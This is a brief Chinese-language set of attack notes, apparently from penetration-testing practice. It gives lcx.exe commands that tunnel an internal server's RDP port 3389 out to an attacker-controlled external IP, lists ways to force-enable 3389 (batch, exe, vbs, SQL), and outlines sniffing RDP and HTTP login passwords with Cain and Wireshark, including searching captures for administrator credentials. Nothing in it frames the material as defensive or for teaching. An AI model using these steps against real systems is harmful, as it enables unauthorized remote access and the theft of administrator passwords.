内网主机输入命令

lcx.exe -slave 攻击者外网ip 外网端口(例如是1111)  服务器内网ip 内网端口(例如是3389)

将服务器内网ip转发到攻击者外网ip。

外网主机输入命令

lcx.exe -listen 1111 3389 (1131端口也行，端口不能被占用)

将1111转发到本地3389，此时连接本地127.0.0.1 3389就相当于连接了服务器的3389.

 

开启3389

双击批处理文件开3389

双击exe文件开3389

双击vbs文件开启3389

使用sql语句开3389

 

嗅探3389密码和http登录的密码

cain：嗅探3389密码

用记事本打开搜索a.d.m.i.n查找管理员账户密码。

 

cain：嗅探http登录的密码

点击配置

在网页进行登录操作。

 

kali 输入命令：wireshark

选择监听端口

登陆远程，嗅探，右键嗅探到的文件